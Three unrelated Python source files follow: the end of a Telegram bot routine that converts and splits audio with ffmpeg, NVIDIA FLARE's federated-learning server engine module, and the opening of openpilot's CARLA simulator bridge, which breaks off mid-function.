# FIXME unknown_video is for tiktok
if file_format not in ["mp3", "m4a", "mp4", "unknown_video"]:
raise FileNotSupportedError(file_format)
if file_size > self.MAX_CONVERT_FILE_SIZE:
raise FileTooLargeError(file_size)
# FIXME unknown_video is for tiktok and also tiktok.mp4
if file_format not in ["mp3", "unknown_video"] and "tiktok." not in file:
logger.info("Convirtiendo: %s", file)
try:
file_converted = file.replace(file_ext, ".mp3")
ffinput = ffmpeg.input(file)
ffmpeg.output(ffinput, file_converted, audio_bitrate="128k", vn=None).run()
file = file_converted
file_root, file_ext = os.path.splitext(file)
file_format = file_ext.replace(".", "").lower()
file_size = os.path.getsize(file)
except Exception:
# TODO exceptions
raise FileNotConvertedError
file_parts = []
if file_size <= self.MAX_TG_FILE_SIZE:
file_parts.append(file)
else:
logger.info("Dividiendo: %s", file)
id3 = None
try:
id3 = ID3(file, translate=False)
except:
pass
parts_number = file_size // self.MAX_TG_FILE_SIZE + 1
# https://github.com/c0decracker/video-splitter
# https://superuser.com/a/1354956/464797
try:
# file_duration = float(ffmpeg.probe(file)['format']['duration'])
part_size = file_size // parts_number
cur_position = 0
for i in range(parts_number):
file_part = file.replace(file_ext, ".part{}{}".format(str(i + 1), file_ext))
ffinput = ffmpeg.input(file)
if i == (parts_number - 1):
ffmpeg.output(ffinput, file_part, codec="copy", vn=None, ss=cur_position).run()
else:
ffmpeg.output(ffinput, file_part, codec="copy", vn=None, ss=cur_position, fs=part_size).run()
part_duration = float(ffmpeg.probe(file_part)['format']['duration'])
cur_position += part_duration
if id3:
try:
id3.save(file_part, v1=2, v2_version=4)
except:
pass
file_parts.append(file_part)
except Exception:
# TODO exceptions
raise FileSplittedPartiallyError(file_parts)
return file_parts
def send_audio_file_parts(self, bot, chat_id, file_parts, reply_to_message_id=None, caption=None):
sent_audio_ids = []
for index, file_part in enumerate(file_parts):
path = pathlib.Path(file_part)
file_name = os.path.split(file_part)[-1]
# file_name = translit(file_name, 'ru', reversed=True)
logger.info("Enviando: %s", file_name)
bot.send_chat_action(chat_id=chat_id, action=ChatAction.UPLOAD_AUDIO)
caption_part = None
if len(file_parts) > 1:
caption_part = "Part {} of {}".format(str(index + 1), str(len(file_parts)))
if caption:
if caption_part:
caption_full = caption_part + " | " + caption
else:
caption_full = caption
else:
if caption_part:
caption_full = caption_part
else:
caption_full = ""
# caption_full = textwrap.shorten(caption_full, width=190, placeholder="..")
for i in range(3):
try:
if file_part.endswith('.mp3'):
mp3 = MP3(file_part)
duration = round(mp3.info.length)
performer = None
title = None
try:
performer = ", ".join(mp3['artist'])
title = ", ".join(mp3['title'])
except:
pass
if "127.0.0.1" in self.TG_BOT_API:
audio = path.absolute().as_uri()
logger.debug(audio)
elif self.SERVE_AUDIO:
audio = str(urljoin(self.APP_URL, str(path.relative_to(self.DL_DIR))))
logger.debug(audio)
else:
audio = open(file_part, 'rb')
if i > 0:
# maybe: Reply message not found
reply_to_message_id = None
audio_msg = bot.send_audio(chat_id=chat_id,
reply_to_message_id=reply_to_message_id,
audio=audio,
duration=duration,
performer=performer,
title=title,
caption=caption_full,
parse_mode='Markdown')
sent_audio_ids.append(audio_msg.audio.file_id)
logger.info("El envío ha sido exitoso: %s", file_name)
break
# FIXME unknown_video is for tiktok
elif file_part.endswith('.unknown_video') or "tiktok." in file_part:
video = open(file_part, 'rb')
video_msg = bot.send_video(chat_id=chat_id,
reply_to_message_id=reply_to_message_id,
video=video,
# duration=duration,
caption=caption_full,
parse_mode='Markdown')
sent_audio_ids.append(video_msg.video.file_id)
logger.info("El envío ha sido exitoso: %s", file_name)
break
except TelegramError:
if i == 2:
logger.exception("El envío ha fallado debido a TelegramError: %s", file_name)
if len(sent_audio_ids) != len(file_parts):
raise FileSentPartiallyError(sent_audio_ids)
return sent_audio_ids
|
server_engine.py
|
# Copyright (c) 2021-2022, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import logging
import multiprocessing
import os
import pickle
import re
import shlex
import shutil
import subprocess
import sys
import threading
import time
from concurrent.futures import ThreadPoolExecutor
from multiprocessing.connection import Client as CommandClient
from multiprocessing.connection import Listener
from threading import Lock
from typing import Dict, List, Tuple
from nvflare.apis.client import Client
from nvflare.apis.fl_component import FLComponent
from nvflare.apis.fl_constant import (
AdminCommandNames,
FLContextKey,
MachineStatus,
ReservedTopic,
ReturnCode,
RunProcessKey,
ServerCommandKey,
ServerCommandNames,
SnapshotKey,
WorkspaceConstants,
)
from nvflare.apis.fl_context import FLContext, FLContextManager
from nvflare.apis.fl_snapshot import RunSnapshot
from nvflare.apis.impl.job_def_manager import JobDefManagerSpec
from nvflare.apis.shareable import Shareable, make_reply
from nvflare.apis.utils.common_utils import get_open_ports
from nvflare.apis.utils.fl_context_utils import get_serializable_data
from nvflare.apis.workspace import Workspace
from nvflare.fuel.hci.zip_utils import zip_directory_to_bytes
from nvflare.private.admin_defs import Message
from nvflare.private.defs import RequestHeader, TrainingTopic
from nvflare.private.fed.server.server_json_config import ServerJsonConfigurator
from nvflare.private.scheduler_constants import ShareableHeader
from nvflare.widgets.info_collector import InfoCollector
from nvflare.widgets.widget import Widget, WidgetID
from .admin import ClientReply
from .client_manager import ClientManager
from .job_runner import JobRunner
from .run_manager import RunManager
from .server_engine_internal_spec import EngineInfo, RunInfo, ServerEngineInternalSpec
from .server_status import ServerStatus
class ClientConnection:
def __init__(self, client):
self.client = client
def send(self, data):
data = pickle.dumps(data)
self.client.send(data)
def recv(self):
return self.client.recv()
class ServerEngine(ServerEngineInternalSpec):
def __init__(self, server, args, client_manager: ClientManager, snapshot_persistor, workers=3):
"""Server engine.
Args:
server: server
args: arguments
client_manager (ClientManager): client manager.
workers: number of worker threads.
"""
# TODO:: clean up the server function / requirement here should be BaseServer
self.server = server
self.args = args
self.run_processes = {}
self.execution_exception_run_processes = {}
self.run_manager = None
self.conf = None
# TODO:: does this class need client manager?
self.client_manager = client_manager
self.widgets = {
WidgetID.INFO_COLLECTOR: InfoCollector(),
# WidgetID.FED_EVENT_RUNNER: ServerFedEventRunner()
}
self.engine_info = EngineInfo()
if not workers >= 1:
raise ValueError("workers must >= 1 but got {}".format(workers))
self.executor = ThreadPoolExecutor(max_workers=workers)
self.lock = Lock()
self.logger = logging.getLogger(self.__class__.__name__)
self.asked_to_stop = False
self.snapshot_persistor = snapshot_persistor
self.parent_conn = None
self.parent_conn_lock = Lock()
self.job_runner = None
self.job_def_manager = None
self.snapshot_lock = multiprocessing.Lock()
def _get_server_app_folder(self):
return WorkspaceConstants.APP_PREFIX + "server"
def _get_client_app_folder(self, client_name):
return WorkspaceConstants.APP_PREFIX + client_name
def _get_run_folder(self, job_id):
return os.path.join(self.args.workspace, WorkspaceConstants.WORKSPACE_PREFIX + str(job_id))
def get_engine_info(self) -> EngineInfo:
self.engine_info.app_names = {}
if bool(self.run_processes):
self.engine_info.status = MachineStatus.STARTED
else:
self.engine_info.status = MachineStatus.STOPPED
for job_id, _ in self.run_processes.items():
run_folder = os.path.join(self.args.workspace, WorkspaceConstants.WORKSPACE_PREFIX + str(job_id))
app_file = os.path.join(run_folder, "fl_app.txt")
if os.path.exists(app_file):
with open(app_file, "r") as f:
self.engine_info.app_names[job_id] = f.readline().strip()
else:
self.engine_info.app_names[job_id] = "?"
return self.engine_info
def get_run_info(self) -> RunInfo:
if self.run_manager:
return self.run_manager.get_run_info()
else:
return None
def create_parent_connection(self, port):
while not self.parent_conn:
try:
address = ("localhost", port)
self.parent_conn = CommandClient(address, authkey="parent process secret password".encode())
except BaseException:
time.sleep(1.0)
pass
threading.Thread(target=self.heartbeat_to_parent, args=[]).start()
def heartbeat_to_parent(self):
while True:
try:
with self.parent_conn_lock:
data = {ServerCommandKey.COMMAND: ServerCommandNames.HEARTBEAT, ServerCommandKey.DATA: {}}
self.parent_conn.send(data)
time.sleep(1.0)
except BaseException:
# The parent process can not be reached. Terminate the child process.
break
# delay some time for the wrap up process before the child process self terminate.
time.sleep(30)
os.killpg(os.getpgid(os.getpid()), 9)
def delete_job_id(self, num):
job_id_folder = os.path.join(self.args.workspace, WorkspaceConstants.WORKSPACE_PREFIX + str(num))
if os.path.exists(job_id_folder):
shutil.rmtree(job_id_folder)
return ""
def get_clients(self) -> [Client]:
return list(self.client_manager.get_clients().values())
def validate_clients(self, client_names: List[str]) -> Tuple[List[Client], List[str]]:
return self._get_all_clients_from_inputs(client_names)
def start_app_on_server(self, run_number: str, job_id: str = None, job_clients=None, snapshot=None) -> str:
if run_number in self.run_processes.keys():
return f"Server run_{run_number} already started."
else:
app_root = os.path.join(self._get_run_folder(run_number), self._get_server_app_folder())
if not os.path.exists(app_root):
return "Server app does not exist. Please deploy the server app before starting."
self.engine_info.status = MachineStatus.STARTING
app_custom_folder = ""
if self.server.enable_byoc:
app_custom_folder = os.path.join(app_root, "custom")
open_ports = get_open_ports(2)
self._start_runner_process(
self.args, app_root, run_number, app_custom_folder, open_ports, job_id, job_clients, snapshot
)
threading.Thread(target=self._listen_command, args=(open_ports[0], run_number)).start()
self.engine_info.status = MachineStatus.STARTED
return ""
def _listen_command(self, listen_port, job_id):
address = ("localhost", int(listen_port))
listener = Listener(address, authkey="parent process secret password".encode())
conn = listener.accept()
while job_id in self.run_processes.keys():
clients = self.run_processes.get(job_id).get(RunProcessKey.PARTICIPANTS)
job_id = self.run_processes.get(job_id).get(RunProcessKey.JOB_ID)
try:
if conn.poll(0.1):
received_data = conn.recv()
command = received_data.get(ServerCommandKey.COMMAND)
data = received_data.get(ServerCommandKey.DATA)
if command == ServerCommandNames.GET_CLIENTS:
return_data = {ServerCommandKey.CLIENTS: clients, ServerCommandKey.JOB_ID: job_id}
conn.send(return_data)
elif command == ServerCommandNames.AUX_SEND:
targets = data.get("targets")
topic = data.get("topic")
request = data.get("request")
timeout = data.get("timeout")
fl_ctx = data.get("fl_ctx")
replies = self.aux_send(
targets=targets, topic=topic, request=request, timeout=timeout, fl_ctx=fl_ctx
)
conn.send(replies)
except BaseException as e:
self.logger.warning(f"Failed to process the child process command: {e}", exc_info=True)
def wait_for_complete(self, job_id):
while True:
try:
with self.lock:
command_conn = self.get_command_conn(job_id)
if command_conn:
data = {ServerCommandKey.COMMAND: ServerCommandNames.HEARTBEAT, ServerCommandKey.DATA: {}}
command_conn.send(data)
time.sleep(1.0)
except BaseException:
with self.lock:
run_process_info = self.run_processes.pop(job_id)
return_code = run_process_info[RunProcessKey.CHILD_PROCESS].poll()
# if process exit but with Execution exception
if return_code and return_code != 0:
self.execution_exception_run_processes[job_id] = run_process_info
self.engine_info.status = MachineStatus.STOPPED
break
def _start_runner_process(
self, args, app_root, run_number, app_custom_folder, open_ports, job_id, job_clients, snapshot
):
new_env = os.environ.copy()
if app_custom_folder != "":
new_env["PYTHONPATH"] = new_env.get("PYTHONPATH", "") + os.pathsep + app_custom_folder
listen_port = open_ports[1]
if snapshot:
restore_snapshot = True
else:
restore_snapshot = False
command_options = ""
for t in args.set:
command_options += " " + t
command = (
sys.executable
+ " -m nvflare.private.fed.app.server.runner_process -m "
+ args.workspace
+ " -s fed_server.json -r "
+ app_root
+ " -n "
+ str(run_number)
+ " -p "
+ str(listen_port)
+ " -c "
+ str(open_ports[0])
+ " --set"
+ command_options
+ " print_conf=True restore_snapshot="
+ str(restore_snapshot)
)
# use os.setsid to create new process group ID
process = subprocess.Popen(shlex.split(command, True), preexec_fn=os.setsid, env=new_env)
if not job_id:
job_id = ""
if not job_clients:
job_clients = self.client_manager.clients
with self.lock:
self.run_processes[run_number] = {
RunProcessKey.LISTEN_PORT: listen_port,
RunProcessKey.CONNECTION: None,
RunProcessKey.CHILD_PROCESS: process,
RunProcessKey.JOB_ID: job_id,
RunProcessKey.PARTICIPANTS: job_clients,
}
threading.Thread(target=self.wait_for_complete, args=[run_number]).start()
return process
def get_job_clients(self, client_sites):
job_clients = {}
if client_sites:
for site, dispatch_info in client_sites.items():
client = self.get_client_from_name(site)
if client:
job_clients[client.token] = client
return job_clients
def remove_custom_path(self):
regex = re.compile(".*/run_.*/custom")
custom_paths = list(filter(regex.search, sys.path))
for path in custom_paths:
sys.path.remove(path)
def abort_app_on_clients(self, clients: List[str]) -> str:
status = self.engine_info.status
if status == MachineStatus.STOPPED:
return "Server app has not started."
if status == MachineStatus.STARTING:
return "Server app is starting, please wait for started before abort."
return ""
def abort_app_on_server(self, job_id: str) -> str:
if job_id not in self.run_processes.keys():
return "Server app has not started."
self.logger.info("Abort the server app run.")
try:
with self.lock:
command_conn = self.get_command_conn(job_id)
if command_conn:
data = {ServerCommandKey.COMMAND: AdminCommandNames.ABORT, ServerCommandKey.DATA: {}}
command_conn.send(data)
status_message = command_conn.recv()
self.logger.info(f"Abort server: {status_message}")
except BaseException:
with self.lock:
child_process = self.run_processes.get(job_id, {}).get(RunProcessKey.CHILD_PROCESS, None)
if child_process:
child_process.terminate()
finally:
with self.lock:
self.run_processes.pop(job_id)
self.engine_info.status = MachineStatus.STOPPED
return ""
def check_app_start_readiness(self, job_id: str) -> str:
if job_id not in self.run_processes.keys():
return f"Server app run_{job_id} has not started."
return ""
def shutdown_server(self) -> str:
status = self.server.status
if status == ServerStatus.STARTING:
return "Server app is starting, please wait for started before shutdown."
self.logger.info("FL server shutdown.")
touch_file = os.path.join(self.args.workspace, "shutdown.fl")
_ = self.executor.submit(lambda p: server_shutdown(*p), [self.server, touch_file])
while self.server.status != ServerStatus.SHUTDOWN:
time.sleep(1.0)
return ""
def restart_server(self) -> str:
status = self.server.status
if status == ServerStatus.STARTING:
return "Server is starting, please wait for started before restart."
self.logger.info("FL server restart.")
touch_file = os.path.join(self.args.workspace, "restart.fl")
_ = self.executor.submit(lambda p: server_shutdown(*p), [self.server, touch_file])
while self.server.status != ServerStatus.SHUTDOWN:
time.sleep(1.0)
return ""
def get_widget(self, widget_id: str) -> Widget:
return self.widgets.get(widget_id)
def get_client_name_from_token(self, token: str) -> str:
client = self.server.client_manager.clients.get(token)
if client:
return client.name
else:
return ""
def get_all_clients(self):
return list(self.server.client_manager.clients.keys())
def get_client_from_name(self, client_name):
for c in self.get_clients():
if client_name == c.name:
return c
return None
def _get_all_clients_from_inputs(self, inputs):
clients = []
invalid_inputs = []
for item in inputs:
client = self.client_manager.clients.get(item)
# if item in self.get_all_clients():
if client:
clients.append(client)
else:
client = self.get_client_from_name(item)
if client:
clients.append(client)
else:
invalid_inputs.append(item)
return clients, invalid_inputs
def get_app_data(self, app_name: str) -> Tuple[str, object]:
fullpath_src = os.path.join(self.server.admin_server.file_upload_dir, app_name)
if not os.path.exists(fullpath_src):
return f"App folder '{app_name}' does not exist in staging area.", None
data = zip_directory_to_bytes(fullpath_src, "")
return "", data
def get_app_run_info(self, job_id) -> RunInfo:
run_info = None
try:
with self.lock:
command_conn = self.get_command_conn(job_id)
if command_conn:
data = {ServerCommandKey.COMMAND: ServerCommandNames.GET_RUN_INFO, ServerCommandKey.DATA: {}}
command_conn.send(data)
run_info = command_conn.recv()
except BaseException:
self.logger.error(f"Failed to get_app_run_info from run_{job_id}")
return run_info
def set_run_manager(self, run_manager: RunManager):
self.run_manager = run_manager
for _, widget in self.widgets.items():
self.run_manager.add_handler(widget)
def set_job_runner(self, job_runner: JobRunner, job_manager: JobDefManagerSpec):
self.job_runner = job_runner
self.job_def_manager = job_manager
def set_configurator(self, conf: ServerJsonConfigurator):
if not isinstance(conf, ServerJsonConfigurator):
raise TypeError("conf must be ServerJsonConfigurator but got {}".format(type(conf)))
self.conf = conf
def build_component(self, config_dict):
return self.conf.build_component(config_dict)
def new_context(self) -> FLContext:
if self.run_manager:
return self.run_manager.new_context()
else:
# return FLContext()
return FLContextManager(
engine=self, identity_name=self.server.project_name, job_id="", public_stickers={}, private_stickers={}
).new_context()
def get_component(self, component_id: str) -> object:
return self.run_manager.get_component(component_id)
def fire_event(self, event_type: str, fl_ctx: FLContext):
self.run_manager.fire_event(event_type, fl_ctx)
def get_staging_path_of_app(self, app_name: str) -> str:
return os.path.join(self.server.admin_server.file_upload_dir, app_name)
def deploy_app_to_server(self, run_destination: str, app_name: str, app_staging_path: str) -> str:
return self.deploy_app(run_destination, app_name, WorkspaceConstants.APP_PREFIX + "server")
def get_workspace(self) -> Workspace:
return self.run_manager.get_workspace()
def ask_to_stop(self):
self.asked_to_stop = True
def deploy_app(self, job_id, src, dst):
fullpath_src = os.path.join(self.server.admin_server.file_upload_dir, src)
fullpath_dst = os.path.join(self._get_run_folder(job_id), dst)
if not os.path.exists(fullpath_src):
return f"App folder '{src}' does not exist in staging area."
if os.path.exists(fullpath_dst):
shutil.rmtree(fullpath_dst)
shutil.copytree(fullpath_src, fullpath_dst)
app_file = os.path.join(self._get_run_folder(job_id), "fl_app.txt")
if os.path.exists(app_file):
os.remove(app_file)
with open(app_file, "wt") as f:
f.write(f"{src}")
return ""
def remove_clients(self, clients: List[str]) -> str:
for client in clients:
self._remove_dead_client(client)
return ""
def _remove_dead_client(self, token):
_ = self.server.client_manager.remove_client(token)
self.server.remove_client_data(token)
if self.server.admin_server:
self.server.admin_server.client_dead(token)
def register_aux_message_handler(self, topic: str, message_handle_func):
self.run_manager.aux_runner.register_aux_message_handler(topic, message_handle_func)
def send_aux_request(self, targets: [], topic: str, request: Shareable, timeout: float, fl_ctx: FLContext) -> dict:
try:
if not targets:
self.sync_clients_from_main_process()
targets = []
for t in self.get_clients():
targets.append(t.name)
if targets:
return self.run_manager.aux_runner.send_aux_request(
targets=targets, topic=topic, request=request, timeout=timeout, fl_ctx=fl_ctx
)
else:
return {}
except Exception as e:
self.logger.error(f"Failed to send the aux_message: {topic} with exception: {e}.")
def sync_clients_from_main_process(self):
with self.parent_conn_lock:
data = {ServerCommandKey.COMMAND: ServerCommandNames.GET_CLIENTS, ServerCommandKey.DATA: {}}
self.parent_conn.send(data)
return_data = self.parent_conn.recv()
clients = return_data.get(ServerCommandKey.CLIENTS)
self.client_manager.clients = clients
def parent_aux_send(self, targets: [], topic: str, request: Shareable, timeout: float, fl_ctx: FLContext) -> dict:
with self.parent_conn_lock:
data = {
ServerCommandKey.COMMAND: ServerCommandNames.AUX_SEND,
ServerCommandKey.DATA: {
"targets": targets,
"topic": topic,
"request": request,
"timeout": timeout,
"fl_ctx": get_serializable_data(fl_ctx),
},
}
self.parent_conn.send(data)
return_data = self.parent_conn.recv()
return return_data
def aux_send(self, targets: [], topic: str, request: Shareable, timeout: float, fl_ctx: FLContext) -> dict:
# Send the aux messages through admin_server
request.set_peer_props(fl_ctx.get_all_public_props())
message = Message(topic=ReservedTopic.AUX_COMMAND, body=pickle.dumps(request))
message.set_header(RequestHeader.JOB_ID, str(fl_ctx.get_prop(FLContextKey.CURRENT_RUN)))
requests = {}
for n in targets:
requests.update({n: message})
replies = self.server.admin_server.send_requests(requests, timeout_secs=timeout)
results = {}
for r in replies:
client_name = self.get_client_name_from_token(r.client_token)
if r.reply:
try:
results[client_name] = pickle.loads(r.reply.body)
except BaseException:
results[client_name] = make_reply(ReturnCode.COMMUNICATION_ERROR)
self.logger.error(
f"Received unexpected reply from client: {client_name}, "
f"message body:{r.reply.body} processing topic:{topic}"
)
else:
results[client_name] = None
return results
def get_command_conn(self, job_id):
# this function need to be called with self.lock
port = self.run_processes.get(job_id, {}).get(RunProcessKey.LISTEN_PORT)
command_conn = self.run_processes.get(job_id, {}).get(RunProcessKey.CONNECTION, None)
if not command_conn:
try:
address = ("localhost", port)
command_conn = CommandClient(address, authkey="client process secret password".encode())
command_conn = ClientConnection(command_conn)
self.run_processes[job_id][RunProcessKey.CONNECTION] = command_conn
except Exception:
pass
return command_conn
def persist_components(self, fl_ctx: FLContext, completed: bool):
# Call the State Persistor to persist all the component states
# 1. call every component to generate the component states data
# Make sure to include the current round number
# 2. call persistence API to save the component states
try:
job_id = fl_ctx.get_job_id()
snapshot = RunSnapshot(job_id)
for component_id, component in self.run_manager.components.items():
if isinstance(component, FLComponent):
snapshot.set_component_snapshot(
component_id=component_id, component_state=component.get_persist_state(fl_ctx)
)
snapshot.set_component_snapshot(
component_id=SnapshotKey.FL_CONTEXT, component_state=copy.deepcopy(get_serializable_data(fl_ctx).props)
)
workspace = fl_ctx.get_prop(FLContextKey.WORKSPACE_OBJECT)
data = zip_directory_to_bytes(workspace.get_run_dir(fl_ctx.get_prop(FLContextKey.CURRENT_RUN)), "")
snapshot.set_component_snapshot(component_id=SnapshotKey.WORKSPACE, component_state={"content": data})
job_info = fl_ctx.get_prop(FLContextKey.JOB_INFO)
if not job_info:
with self.parent_conn_lock:
data = {ServerCommandKey.COMMAND: ServerCommandNames.GET_CLIENTS, ServerCommandKey.DATA: {}}
self.parent_conn.send(data)
return_data = self.parent_conn.recv()
job_id = return_data.get(ServerCommandKey.JOB_ID)
job_clients = return_data.get(ServerCommandKey.CLIENTS)
fl_ctx.set_prop(FLContextKey.JOB_INFO, (job_id, job_clients))
else:
(job_id, job_clients) = job_info
snapshot.set_component_snapshot(
component_id=SnapshotKey.JOB_INFO,
component_state={SnapshotKey.JOB_CLIENTS: job_clients, SnapshotKey.JOB_ID: job_id},
)
snapshot.completed = completed
self.server.snapshot_location = self.snapshot_persistor.save(snapshot=snapshot)
if not completed:
self.logger.info(f"persist the snapshot to: {self.server.snapshot_location}")
else:
self.logger.info(f"The snapshot: {self.server.snapshot_location} has been removed.")
except BaseException as e:
self.logger.error(f"Failed to persist the components. {str(e)}")
def restore_components(self, snapshot: RunSnapshot, fl_ctx: FLContext):
for component_id, component in self.run_manager.components.items():
component.restore(snapshot.get_component_snapshot(component_id=component_id), fl_ctx)
fl_ctx.props.update(snapshot.get_component_snapshot(component_id=SnapshotKey.FL_CONTEXT))
def dispatch(self, topic: str, request: Shareable, fl_ctx: FLContext) -> Shareable:
return self.run_manager.aux_runner.dispatch(topic=topic, request=request, fl_ctx=fl_ctx)
def show_stats(self, job_id):
stats = None
try:
with self.lock:
command_conn = self.get_command_conn(job_id)
if command_conn:
data = {ServerCommandKey.COMMAND: ServerCommandNames.SHOW_STATS, ServerCommandKey.DATA: {}}
command_conn.send(data)
stats = command_conn.recv()
except BaseException:
self.logger.error(f"Failed to get_stats from run_{job_id}")
return stats
def get_errors(self, job_id):
stats = None
try:
with self.lock:
command_conn = self.get_command_conn(job_id)
if command_conn:
data = {ServerCommandKey.COMMAND: ServerCommandNames.GET_ERRORS, ServerCommandKey.DATA: {}}
command_conn.send(data)
stats = command_conn.recv()
except BaseException:
self.logger.error(f"Failed to get_stats from run_{job_id}")
return stats
def _send_admin_requests(self, requests, timeout_secs=10) -> List[ClientReply]:
return self.server.admin_server.send_requests(requests, timeout_secs=timeout_secs)
def check_client_resources(self, resource_reqs) -> Dict[str, Tuple[bool, str]]:
requests = {}
for site_name, resource_requirements in resource_reqs.items():
# assume server resource is unlimited
if site_name == "server":
continue
request = Message(topic=TrainingTopic.CHECK_RESOURCE, body=pickle.dumps(resource_requirements))
client = self.get_client_from_name(site_name)
if client:
requests.update({client.token: request})
replies = []
if requests:
replies = self._send_admin_requests(requests, 15)
result = {}
for r in replies:
site_name = self.get_client_name_from_token(r.client_token)
if r.reply:
resp = pickle.loads(r.reply.body)
result[site_name] = (
resp.get_header(ShareableHeader.CHECK_RESOURCE_RESULT, False),
resp.get_header(ShareableHeader.RESOURCE_RESERVE_TOKEN, ""),
)
else:
result[site_name] = (False, "")
return result
def cancel_client_resources(
self, resource_check_results: Dict[str, Tuple[bool, str]], resource_reqs: Dict[str, dict]
):
requests = {}
for site_name, result in resource_check_results.items():
check_result, token = result
if check_result and token:
resource_requirements = resource_reqs[site_name]
request = Message(topic=TrainingTopic.CANCEL_RESOURCE, body=pickle.dumps(resource_requirements))
request.set_header(ShareableHeader.RESOURCE_RESERVE_TOKEN, token)
client = self.get_client_from_name(site_name)
if client:
requests.update({client.token: request})
if requests:
_ = self._send_admin_requests(requests)
def start_client_job(self, job_id, client_sites):
requests = {}
for site, dispatch_info in client_sites.items():
resource_requirement = dispatch_info.resource_requirements
token = dispatch_info.token
request = Message(topic=TrainingTopic.START_JOB, body=pickle.dumps(resource_requirement))
request.set_header(RequestHeader.JOB_ID, job_id)
request.set_header(ShareableHeader.RESOURCE_RESERVE_TOKEN, token)
client = self.get_client_from_name(site)
if client:
requests.update({client.token: request})
replies = []
if requests:
replies = self._send_admin_requests(requests, timeout_secs=20)
return replies
def stop_all_jobs(self):
fl_ctx = self.new_context()
self.job_runner.stop_all_runs(fl_ctx)
def close(self):
self.executor.shutdown()
def server_shutdown(server, touch_file):
with open(touch_file, "a"):
os.utime(touch_file, None)
try:
server.fl_shutdown()
server.admin_server.stop()
time.sleep(3.0)
finally:
server.status = ServerStatus.SHUTDOWN
sys.exit(2)
def copy_new_server_properties(server, new_server):
# server.model_manager = new_server.model_manager
# server.model_saver = new_server.model_saver
server.builder = new_server.builder
server.wait_after_min_clients = new_server.wait_after_min_clients
server.outbound_filters = new_server.outbound_filters
server.inbound_filters = new_server.inbound_filters
server.cmd_modules = new_server.cmd_modules
server.processors = new_server.processors
# server.task_name = new_server.task_name
server.min_num_clients = new_server.min_num_clients
server.max_num_clients = new_server.max_num_clients
server.current_round = new_server.current_round
server.num_rounds = new_server.num_rounds
server.start_round = new_server.start_round
# server.heart_beat_timeout = new_server.heart_beat_timeout
# server.handlers = new_server.handlers
# clients = server.client_manager.clients
# server.client_manager = new_server.client_manager
# server.client_manager.clients = clients
server.client_manager.min_num_clients = new_server.client_manager.min_num_clients
server.client_manager.max_num_clients = new_server.client_manager.max_num_clients
server.client_manager.logger = new_server.client_manager.logger
server.client_manager.logger.disabled = False
server.reset_tokens()
server.contributed_clients.clear()
# server.accumulator.clear()
server.fl_ctx = new_server.fl_ctx
server.controller = new_server.controller
# server.model_aggregator = new_server.model_aggregator
# server.model_saver = new_server.model_saver
# server.shareable_generator = new_server.shareable_generator
def set_up_run_config(server, conf):
server.heart_beat_timeout = conf.heartbeat_timeout
server.runner_config = conf.runner_config
server.handlers = conf.handlers
|
bridge.py
|
#!/usr/bin/env python3
import argparse
import math
import threading
import time
import os
from multiprocessing import Process, Queue
from typing import Any
import carla # pylint: disable=import-error
import numpy as np
import pyopencl as cl
import pyopencl.array as cl_array
from lib.can import can_function
import cereal.messaging as messaging
from cereal import log
from cereal.visionipc.visionipc_pyx import VisionIpcServer, VisionStreamType # pylint: disable=no-name-in-module, import-error
from common.basedir import BASEDIR
from common.numpy_fast import clip
from common.params import Params
from common.realtime import DT_DMON, Ratekeeper
from selfdrive.car.honda.values import CruiseButtons
from selfdrive.test.helpers import set_params_enabled
parser = argparse.ArgumentParser(description='Bridge between CARLA and openpilot.')
parser.add_argument('--joystick', action='store_true')
parser.add_argument('--low_quality', action='store_true')
parser.add_argument('--town', type=str, default='Town04_Opt')
parser.add_argument('--spawn_point', dest='num_selected_spawn_point', type=int, default=16)
args = parser.parse_args()
W, H = 1928, 1208
REPEAT_COUNTER = 5
PRINT_DECIMATION = 100
STEER_RATIO = 15.
pm = messaging.PubMaster(['roadCameraState', 'sensorEvents', 'can', "gpsLocationExternal"])
sm = messaging.SubMaster(['carControl', 'controlsState'])
class VehicleState:
def __init__(self):
self.speed = 0
self.angle = 0
self.bearing_deg = 0.0
self.vel = carla.Vector3D()
self.cruise_button = 0
self.is_engaged = False
def steer_rate_limit(old, new):
# Rate limiting to 0.5 degrees per step
limit = 0.5
if new > old + limit:
return old + limit
elif new < old - limit:
return old - limit
else:
return new
class Camerad:
def __init__(self):
self.frame_id = 0
self.vipc_server = VisionIpcServer("camerad")
# TODO: remove RGB buffers once the last RGB vipc subscriber is removed
self.vipc_server.create_buffers(VisionStreamType.VISION_STREAM_RGB_BACK, 4, True, W, H)
self.vipc_server.create_buffers(VisionStreamType.VISION_STREAM_ROAD, 40, False, W, H)
self.vipc_server.start_listener()
# set up for pyopencl rgb to yuv conversion
self.ctx = cl.create_some_context()
self.queue = cl.CommandQueue(self.ctx)
cl_arg = f" -DHEIGHT={H} -DWIDTH={W} -DRGB_STRIDE={W*3} -DUV_WIDTH={W // 2} -DUV_HEIGHT={H // 2} -DRGB_SIZE={W * H} -DCL_DEBUG "
# TODO: move rgb_to_yuv.cl to local dir once the frame stream camera is removed
kernel_fn = os.path.join(BASEDIR, "selfdrive", "camerad", "transforms", "rgb_to_yuv.cl")
prg = cl.Program(self.ctx, open(kernel_fn).read()).build(cl_arg)
self.krnl = prg.rgb_to_yuv
self.Wdiv4 = W // 4 if (W % 4 == 0) else (W + (4 - W % 4)) // 4
self.Hdiv4 = H // 4 if (H % 4 == 0) else (H + (4 - H % 4)) // 4
def cam_callback(self, image):
img = np.frombuffer(image.raw_data, dtype=np.dtype("uint8"))
img = np.reshape(img, (H, W, 4))
img = img[:, :, [0, 1, 2]].copy()
# convert RGB frame to YUV
rgb = np.reshape(img, (H, W * 3))
rgb_cl = cl_array.to_device(self.queue, rgb)
yuv_cl = cl_array.empty_like(rgb_cl)
self.krnl(self.queue, (np.int32(self.Wdiv4), np.int32(self.Hdiv4)), None, rgb_cl.data, yuv_cl.data).wait()
yuv = np.resize(yuv_cl.get(), np.int32(rgb.size / 2))
eof = self.frame_id * 0.05
# TODO: remove RGB send once the last RGB vipc subscriber is removed
self.vipc_server.send(VisionStreamType.VISION_STREAM_RGB_BACK, img.tobytes(), self.frame_id, eof, eof)
